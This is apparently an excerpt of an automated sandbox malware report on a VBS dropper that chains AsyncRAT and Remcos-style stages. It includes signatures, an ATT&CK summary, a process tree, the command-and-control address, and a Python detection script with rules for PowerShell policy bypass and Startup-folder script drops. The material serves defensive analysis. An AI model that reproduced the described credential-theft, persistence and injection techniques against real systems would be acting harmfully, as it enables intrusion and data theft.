        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00404F51 GetLocalTime,CreateEventA,CreateThread,17_2_00404F51
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041B60D GetComputerNameExW,GetUserNameW,17_2_0041B60D
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00449190
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: Yara match | File source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Source: RegAsm.exe, 00000004.00000002.3316991933.0000000005474000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: MSASCui.exe
        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: procexp.exe
        Source: RegAsm.exe, 00000004.00000002.3318000698.000000000550E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3307841453.0000000001150000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: wscript.exe, 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 17_2_0040BA12
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 19_2_0040BA12
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 21_2_0040BA12
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 23_2_0040BA12
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 27_2_0040BA12
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 17_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \key3.db 17_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 19_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \key3.db 19_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 21_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \key3.db 21_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 23_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \key3.db 23_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 27_2_0040BB30
        Source: C:\Windows\winhlp32.exe | Code function: \key3.db 27_2_0040BB30

        Remote Access Functionality

        Source: Yara match | File source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR
        Source: C:\Windows\winhlp32.exe | Code function: cmd.exe 17_2_0040569A
        Source: C:\Windows\winhlp32.exe | Code function: cmd.exe 19_2_0040569A
        Source: C:\Windows\winhlp32.exe | Code function: cmd.exe 21_2_0040569A
        Source: C:\Windows\winhlp32.exe | Code function: cmd.exe 23_2_0040569A
        Source: C:\Windows\winhlp32.exe | Code function: cmd.exe 27_2_0040569A
MITRE ATT&CK Matrix

Only the techniques the report flags are listed below, grouped by the tactic column they sit in; the number in parentheses is the report's hit count for that technique. The matrix also renders the deprecated "Scripting" technique (621) in the Resource Development and Persistence columns, which is where the older ATT&CK column order put Execution and Defense Evasion; under current ATT&CK that behaviour is covered by Command and Scripting Interpreter. Reconnaissance, Resource Development, Initial Access, Lateral Movement and Exfiltration have no flagged techniques.

Execution: Windows Management Instrumentation (2); Native API (11); Exploitation for Client Execution (1); Command and Scripting Interpreter (1); Scheduled Task/Job (1); Service Execution (2); PowerShell (3)
Persistence: DLL Side-Loading (1); Windows Service (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2)
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (422); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (131); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (41); Access Token Manipulation (1); Process Injection (422); Regsvr32 (1)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (4); System Information Discovery (44); Security Software Discovery (251); Virtualization/Sandbox Evasion (41); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Impact: System Shutdown/Reboot (1); Defacement (1)

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph (ID 1431185; sample lmg1_Mlakaifa443456.vbs; start date 24/04/2024; architecture Windows; score 100)

Contacted hosts: geoplugin.net, bg.microsoft.map.fastly.net
Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures

Process tree (indentation is parent/child; signatures, dropped files and network contacts are listed under the process they were attributed to):

wscript.exe (first root instance)
    signatures: VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
    wscript.exe
        dropped: C:\Users\user\AppData\Local\...\dynwrapx.dll (PE32)
        signatures: VBScript performs obfuscated calls to suspicious functions; Drops VBS files to the startup folder; Contains functionality to inject code into remote processes; 3 other signatures
        RegAsm.exe (three instances, plus 5 other processes)
            network: 139.99.133.66 port 4444 (local ports 49704, 49706), OVHFR, Canada
            dropped: C:\Users\user\AppData\Local\Temp\remc1.vbs (Unicode)
            cmd.exe
                signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
                conhost.exe
                powershell.exe
                    wscript.exe
                        dropped: C:\Users\user\AppData\Roaming\...\remc1.vbs (Unicode)
                        signatures: Windows Shell Script Host drops VBS files; Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
                        winhlp32.exe
                            network: geoplugin.net (178.237.33.50) port 80 (local port 49716), ATOM86-ASATOM86NL, Netherlands
                            signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
                        regsvr32.exe (two instances, plus 5 other processes)
wscript.exe (second root instance)
    signatures: Wscript called in batch mode (suppress errors)
    wscript.exe
        signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign process
        regsvr32.exe (two instances, plus 5 other processes)
        winhlp32.exe

Reading the graph: the first-stage VBS drops dynwrapx.dll and spawns RegAsm.exe, a signed .NET utility, as the host for a .NET payload; RegAsm.exe is the only process that talks to 139.99.133.66 on port 4444, which is consistent with the AsyncRAT/DcRat configuration the report extracted, and it writes remc1.vbs to Temp. That script is run through cmd.exe and an execution-policy-bypassing PowerShell, copies itself to the Startup folder, and injects into winhlp32.exe, the process that carries the Remcos-typical signatures (geoplugin.net lookup, CMSTPLUA UAC bypass, wallpaper change, browser credential theft). The second root wscript.exe, launched in batch mode (the //B switch), reproduces the regsvr32.exe and winhlp32.exe chain, which shows the Startup-folder persistence is functional rather than merely written.
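The chain above is the kind of thing a process-lineage rule catches long before a file hash does. The following is an added example, not Joe Sandbox code: it runs four rules (script host spawning a known injection target, PowerShell with an execution-policy bypass, a script written into a Startup folder, and an outbound connection from a binary that should never talk to the network) over constructed Sysmon-style events that mirror the report's graph. Every PID, command line and path in EVENTS is invented for the example; the image names, the 4444 destination and the Startup path are the ones the report shows.

```python
"""Chain-based detection for the execution graph in this report, run over
constructed Sysmon-style events (event id 1 = process create, 11 = file create,
3 = network connect). Added example; the telemetry below is invented."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Binaries the report shows being used as injection hosts / living-off-the-land.
INJECTION_TARGETS = {"regasm.exe", "regsvr32.exe", "winhlp32.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd"}
STARTUP_MARKER = "\\start menu\\programs\\startup\\"
# Matches -ExecutionPolicy Bypass and the abbreviations PowerShell accepts (-ex, -exec, -ep).
EXEC_POLICY_BYPASS = re.compile(r"-(?:ex\w*|ep)\s+bypass", re.IGNORECASE)

# Constructed telemetry mirroring the behaviour graph (PIDs and paths are assumptions).
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"'},
    {"id": 1, "pid": 101, "ppid": 100, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'wscript.exe //B "C:\Users\user\AppData\Local\Temp\stage2.vbs"'},
    {"id": 11, "pid": 101, "target": r"C:\Users\user\AppData\Local\Temp\dynwrapx.dll"},
    {"id": 1, "pid": 102, "ppid": 101, "cmdline": "RegAsm.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"id": 3, "pid": 102, "dst_ip": "139.99.133.66", "dst_port": 4444},
    {"id": 11, "pid": 102, "target": r"C:\Users\user\AppData\Local\Temp\remc1.vbs"},
    {"id": 1, "pid": 103, "ppid": 102, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "cmd.exe /c powershell -ExecutionPolicy Bypass -File remc1.ps1"},
    {"id": 1, "pid": 104, "ppid": 103, "cmdline": "powershell -ExecutionPolicy Bypass -File remc1.ps1",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 1, "pid": 105, "ppid": 104, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Local\Temp\remc1.vbs"'},
    {"id": 11, "pid": 105, "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
                                     r"\Start Menu\Programs\Startup\remc1.vbs"},
    {"id": 1, "pid": 106, "ppid": 105, "image": r"C:\Windows\winhlp32.exe", "cmdline": "winhlp32.exe"},
    # Benign noise the rules must not fire on: a logon script and a developer's RegAsm use.
    {"id": 1, "pid": 200, "ppid": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe logon.vbs"},
    {"id": 1, "pid": 201, "ppid": 5, "cmdline": "RegAsm.exe mylib.dll",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"id": 11, "pid": 200, "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
                                     r"\Start Menu\Programs\Startup\Notes.lnk"},
]


def basename(image):
    return ntpath.basename(image).lower()


def process_table(events):
    """pid -> process-create event, so file and network events can be attributed to an image."""
    return {e["pid"]: e for e in events if e["id"] == 1}


def ancestry(procs, pid):
    """'child <- parent <- ...' up to the first PID we hold no record for."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return " <- ".join(chain)


def detect(events):
    procs = process_table(events)
    findings = []

    def hit(rule, pid, detail):
        findings.append({"rule": rule, "pid": pid, "detail": detail, "chain": ancestry(procs, pid)})

    for e in events:
        if e["id"] == 1:
            name = basename(e["image"])
            parent = procs.get(e["ppid"])
            if parent and basename(parent["image"]) in SCRIPT_HOSTS and name in INJECTION_TARGETS:
                hit("script_host_spawns_injection_target", e["pid"], name)
            if name == "powershell.exe" and EXEC_POLICY_BYPASS.search(e.get("cmdline", "")):
                hit("powershell_execution_policy_bypass", e["pid"], e["cmdline"])
        elif e["id"] == 11:
            path = e["target"].lower()
            if STARTUP_MARKER in path and ntpath.splitext(path)[1] in SCRIPT_EXTS:
                hit("script_dropped_to_startup_folder", e["pid"], e["target"])
        elif e["id"] == 3:
            owner = procs.get(e["pid"])
            if owner and basename(owner["image"]) in INJECTION_TARGETS:
                hit("injection_target_outbound_connection", e["pid"], f'{e["dst_ip"]}:{e["dst_port"]}')
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f'{f["rule"]:40} pid={f["pid"]} {f["detail"]}\n    {f["chain"]}')
```

The ancestry string attached to each finding is what turns five separate low-severity hits into one incident: all of them resolve back to the same wscript.exe root, while the benign logon script and the developer's RegAsm.exe (whose parent is not a script host) produce nothing.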

Antivirus detection

Submitted sample:
    lmg1_Mlakaifa443456.vbs: ReversingLabs 26% (Script-WScript.Backdoor.AsyncRAT); Avira 100% (VBS/Drop.Agent.VPXR)
Dropped files:
    C:\Users\user\AppData\Local\Temp\dynwrapx.dll: ReversingLabs 46%
Unpacked PE files: no antivirus matches
Domains: no antivirus matches
URLs:
    http://geoplugin.net/json.gp: URL Reputation 100% (phishing)
    139.99.133.66: Avira URL Cloud 0% (safe)

Contacted domains (name; IP; active; malicious; reputation):
    bg.microsoft.map.fastly.net; 199.232.210.172; active; not malicious; reputation unknown
    geoplugin.net; 178.237.33.50; active; not malicious; reputation unknown

Contacted URLs (name; malicious; antivirus detection; reputation):
    http://geoplugin.net/json.gp; malicious; URL Reputation: phishing; reputation unknown
    139.99.133.66; malicious; Avira URL Cloud: safe; reputation unknown

URLs found in memory or binary data (name; source; malicious; reputation):
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name; RegAsm.exe, 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp; not malicious; reputation high

Contacted IPs (IP; domain; country; ASN; ASN name; malicious):
    178.237.33.50; geoplugin.net; Netherlands; 8455; ATOM86-ASATOM86NL; not malicious
    139.99.133.66; no domain; Canada; 16276; OVHFR; malicious

The two reputation verdicts point the wrong way and should not be copied into a blocklist as they stand. geoplugin.net/json.gp is a public IP-geolocation API that Remcos queries to report the victim's location; it appears in every other Remcos submission listed in the context tables below, so it is a reliable family indicator but a poor blocking target, and the "phishing" label is a reputation-service artefact of that reuse by malware. 139.99.133.66:4444, by contrast, is the address RegAsm.exe connected to directly and the report flags it as malicious from the extracted configuration; the "safe" Avira URL Cloud verdict only means the service had no record of it at analysis time.
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1431185
              Start date and time:2024-04-24 17:03:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 10m 53s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 35
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:lmg1_Mlakaifa443456.vbs
              Detection:MAL
              Classification:mal100.rans.troj.spyw.expl.evad.winVBS@61/10@1/2
              EGA Information:
              • Successful, ratio: 36.8%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 100
              • Number of non-executed functions: 357
              Cookbook Comments:
              • Found application associated with file extension: .vbs
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded IPs from analysis (whitelisted): 23.204.146.169, 23.204.146.147, 23.204.146.202
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
              • Execution Graph export aborted for target RegAsm.exe, PID 2964 because it is empty
              • Execution Graph export aborted for target RegAsm.exe, PID 3160 because it is empty
              • Execution Graph export aborted for target RegAsm.exe, PID 4068 because it is empty
• Execution Graph export aborted for target regsvr32.exe, PID 1272 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 1788 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 3116 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 3128 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 3620 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 4436 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 5672 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 6460 because there are no executed functions
• Execution Graph export aborted for target regsvr32.exe, PID 6664 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • VT rate limit hit for: lmg1_Mlakaifa443456.vbs
Timeline (time; type; description):
    17:04:03; API Interceptor; 1x Sleep call for process RegAsm.exe modified
